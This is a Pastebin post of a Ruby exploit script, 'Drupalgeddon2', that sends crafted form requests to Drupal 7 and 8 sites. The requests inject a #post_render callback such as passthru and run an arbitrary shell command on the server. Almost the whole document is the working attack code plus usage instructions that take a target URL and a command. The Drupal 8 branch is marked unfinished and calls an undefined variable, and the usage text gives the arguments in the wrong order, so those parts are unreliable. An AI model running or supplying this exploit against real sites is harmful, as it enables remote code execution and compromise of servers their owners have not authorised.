Kurobeats

Drupalgeddon2.2

Apr 17th, 2018
1,838
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Ruby 2.87 KB | None | 0 0
  1. #!/usr/bin/env ruby
  2.  
  3. # This version works both Drupal 8.X and Drupal 7.X
  4.  
  5. require 'base64'
  6. require 'json'
  7. require 'net/http'
  8. require 'openssl'
  9.  
  10. class Target
  11.  
  12.     # host = Host URL -> http://example.com
  13.     # PHP method to use, by default passtrhu   
  14.     # command = Command to execute
  15.  
  16.     def initialize(host,command,php_method='passthru')
  17.         @host = host
  18.         @method = php_method
  19.         @command = command
  20.         @uri = URI(host)
  21.  
  22.         @http = create_http
  23.     end
  24.  
  25.     def success
  26.         puts "[+] Target seems to be exploitable! w00hooOO!"
  27.     end
  28.  
  29.     def failed(msg)
  30.         puts "[!] Target does NOT seem to be exploitable: " + msg
  31.         exit
  32.     end
  33.  
  34.     def create_http
  35.         http = Net::HTTP.new(@uri.host, @uri.port)
  36.         # Use SSL/TLS if needed
  37.         if @uri.scheme == 'https'
  38.           http.use_ssl = true
  39.           http.verify_mode = OpenSSL::SSL::VERIFY_NONE
  40.         end
  41.  
  42.         return http
  43.     end
  44.  
  45.     def check_response(response)
  46.         if response.code == "200"
  47.             success    
  48.         else
  49.             failed("Response: " + response.code)
  50.         end
  51.     end
  52.  
  53. end
  54.  
  55. class Drupal8 < Target
  56.     def initialize(host,command,php_method='passthru')
  57.         super(host,command,php_method)
  58.     end
  59.  
  60.     # Not finished yet
  61.     def exploit
  62.  
  63.         # Make the request
  64.         req = Net::HTTP::Post.new(URI.encode("/user/register?element_parents=account/mail/#value&ajax_form=1&_wrapper_format=drupal_ajax"))
  65.         req.body = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + @method + "&mail[a][#type]=markup&mail[a][#markup]=" + @command
  66.  
  67.         response = http.request(req)
  68.         check_response(response)
  69.         puts response.body
  70.  
  71.     end
  72. end
  73.  
  74. class Drupal7 < Target
  75.     def initialize(host,command,php_method='passthru')
  76.         super(host,command,php_method)
  77.     end
  78.  
  79.     def exploit
  80.        
  81.         req = Net::HTTP::Post.new(URI.encode("/?q=user/password&name[#post_render][]=#{@method}&name[#markup]=#{@command}&name[#type]=markup"))
  82.         req.body = 'form_id=user_pass&_triggering_element_name=name'
  83.  
  84.         response = @http.request(req)
  85.  
  86.         form_build_id = /<input type="hidden" name="form_build_id" value="([^"]+)" \/>/.match(response.body)[1]
  87.         post_parameters = "form_build_id=#{form_build_id}"
  88.  
  89.         req = Net::HTTP::Post.new(URI.encode("/?q=file/ajax/name/#value/#{form_build_id}"))
  90.         req.body = post_parameters
  91.  
  92.         response = @http.request(req)
  93.  
  94.         if response.body.split('[{"command"')[0] == ""
  95.             if(@command != 'id')
  96.                 failed("Maybe incorrect input command, try simple command as 'id'")
  97.             end
  98.                 failed("")
  99.         end
  100.  
  101.         success
  102.         puts response.body.split('[{"command"')[0]
  103.     end
  104. end
  105.  
  106.  
  107. # Quick how to use
  108. if ARGV.empty? || ARGV.length < 2
  109.   puts "Usage: ruby drupalggedon2.rb <target> <version [7,8]> <command>"
  110.   puts "       ruby drupalgeddon2.rb 7 https://example.com whoami"
  111.   exit
  112. end
  113.  
  114. # Read in values
  115. target = ARGV[0]
  116. version = ARGV[1]
  117. command = ARGV[2]
  118.  
  119. if version == "7"
  120.     drupal = Drupal7.new(target,command)
  121. else
  122.     drupal = Drupal8.new(target,command)
  123. end
  124.  
  125. drupal.exploit
Advertisement
Add Comment
Please, Sign In to add comment